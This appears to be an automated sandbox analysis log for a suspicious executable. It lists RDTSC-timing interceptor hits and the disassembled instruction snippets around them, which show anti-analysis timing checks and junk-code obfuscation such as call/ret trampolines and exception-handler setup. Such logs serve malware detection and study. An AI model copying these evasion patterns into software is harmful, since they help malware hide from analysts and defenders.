Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2E9 second address: AFE2EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2EE second address: AFE2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE348 second address: AFE367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a jl 00007FD5E912D9F2h 0x00000010 jmp 00007FD5E912D9ECh 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE367 second address: AFE386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FD5E9559C7Ah 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD5E9559C76h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE386 second address: AFE38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE38A second address: AFE393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE8CA second address: AFE8D4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE8D4 second address: AFE8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE8DA second address: AFE8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFEF6C second address: AFEF8D instructions: 0x00000000 rdtsc 0x00000002 js 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E9559C83h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFEF8D second address: AFEF9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFEF9E second address: AFEFA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF28B second address: AFF2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD5E912D9F2h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2AA second address: AFF2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2AE second address: AFF2BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2BF second address: AFF2C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD5E9559C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2C9 second address: AFF2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF5F3 second address: AFF5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFFB42 second address: AFFB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD5E912D9F4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0035B second address: B00378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B00378 second address: B00391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B01C32 second address: B01C55 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD5E9559C85h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD5E9559C7Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0275A second address: B02767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD5E912D9E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B029DA second address: B029E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B03CB4 second address: B03CCA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD5E912D9ECh 0x00000008 js 00007FD5E912D9E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B03CCA second address: B03CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B04959 second address: B0495F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0495F second address: B04963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0526B second address: B05286 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B05286 second address: B0528B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B076A7 second address: B076AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B09D59 second address: B09D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FD5E9559C7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B07872 second address: B07876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B07876 second address: B0787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0787C second address: B07912 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FD5E912D9E6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FD5E912D9F3h 0x00000013 jl 00007FD5E912D9E8h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FD5E912D9E8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 xor dword ptr [ebp+122D374Bh], ecx 0x0000003d mov ebx, dword ptr [ebp+122D3082h] 0x00000043 push dword ptr fs:[00000000h] 0x0000004a jc 00007FD5E912D9ECh 0x00000050 mov ebx, dword ptr [ebp+122D3713h] 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d and di, 42EFh 0x00000062 mov eax, dword ptr [ebp+122D0CA1h] 0x00000068 mov dword ptr [ebp+122D1B0Dh], edx 0x0000006e push FFFFFFFFh 0x00000070 sub dword ptr [ebp+122D3335h], ecx 0x00000076 push eax 0x00000077 push edi 0x00000078 jg 00007FD5E912D9ECh 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0ACE7 second address: B0AD4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D1ADDh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FD5E9559C78h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 jng 00007FD5E9559C78h 0x00000036 mov ebx, eax 0x00000038 xchg eax, esi 0x00000039 jmp 00007FD5E9559C88h 0x0000003e push eax 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0A083 second address: B0A087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0AE58 second address: B0AE73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0CD3F second address: B0CD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0C013 second address: B0C018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0C018 second address: B0C035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0DD3B second address: B0DD4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0FDC5 second address: B0FDFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD5E912D9F5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0FDFA second address: B0FE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10E50 second address: B10E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10E56 second address: B10EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD5E9559C82h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 movsx ebx, ax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FD5E9559C78h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 ja 00007FD5E9559C82h 0x00000039 mov ebx, ecx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10EB6 second address: B10ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10015 second address: B100A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 29F7A222h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jne 00007FD5E9559C79h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FD5E9559C78h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e mov eax, dword ptr [ebp+122D05ADh] 0x00000044 mov bx, C0DBh 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007FD5E9559C78h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 add dword ptr [ebp+122D37FBh], ecx 0x0000006a jmp 00007FD5E9559C80h 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 push eax 0x00000074 pop eax 0x00000075 pushad 0x00000076 popad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B100A7 second address: B100D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD5E912D9F0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD5E912D9F7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B13F85 second address: B13F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B13F8B second address: B13F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B15CE1 second address: B15D02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD5E9559C89h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B15D02 second address: B15D54 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f mov dword ptr [ebp+122D372Bh], ebx 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D19DBh] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FD5E912D9E8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a jmp 00007FD5E912D9EDh 0x0000003f push eax 0x00000040 push esi 0x00000041 push esi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B140BE second address: B140C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B140C4 second address: B1417D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD5E912D9F4h 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2621h], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jmp 00007FD5E912D9F4h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FD5E912D9E8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 call 00007FD5E912D9EDh 0x00000048 mov ebx, dword ptr [ebp+122D30CCh] 0x0000004e pop ebx 0x0000004f mov dword ptr [ebp+122D19E1h], ecx 0x00000055 mov eax, dword ptr [ebp+122D0259h] 0x0000005b xor ebx, dword ptr [ebp+122D3809h] 0x00000061 push FFFFFFFFh 0x00000063 mov di, cx 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a jmp 00007FD5E912D9F1h 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B16C62 second address: B16C6C instructions: 0x00000000 rdtsc 0x00000002 js 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10FE2 second address: B10FE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B1417D second address: B14182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10FE8 second address: B10FF2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD5E912D9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B16C6C second address: B16CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FD5E9559C85h 0x00000010 push edi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 popad 0x00000015 nop 0x00000016 js 00007FD5E9559C78h 0x0000001c mov edi, ebx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FD5E9559C78h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a jng 00007FD5E9559C7Ch 0x00000040 sbb ebx, 69D69CD4h 0x00000046 push 00000000h 0x00000048 xor ebx, dword ptr [ebp+122D37CDh] 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 je 00007FD5E9559C76h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B16CE5 second address: B16CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B14F89 second address: B14F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B60F4D second address: B60F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A74C second address: B6A752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A752 second address: B6A756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A756 second address: B6A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6998C second address: B69995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B69995 second address: B6999B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6999B second address: B699C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FD5E9559C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E9559C88h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B69EAF second address: B69EB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B69EB9 second address: B69ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD5E9559C81h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A1A2 second address: B6A1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FD5E912D9F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A1AF second address: B6A1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2DA second address: B6A2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2E2 second address: B6A2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2E7 second address: B6A2F1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD5E912D9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2F1 second address: B6A2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2F8 second address: B6A300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B74418 second address: B7441D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B72747 second address: B7275A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FD5E912D9EAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B72AED second address: B72AFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007FD5E9559C76h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B730BA second address: B730BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
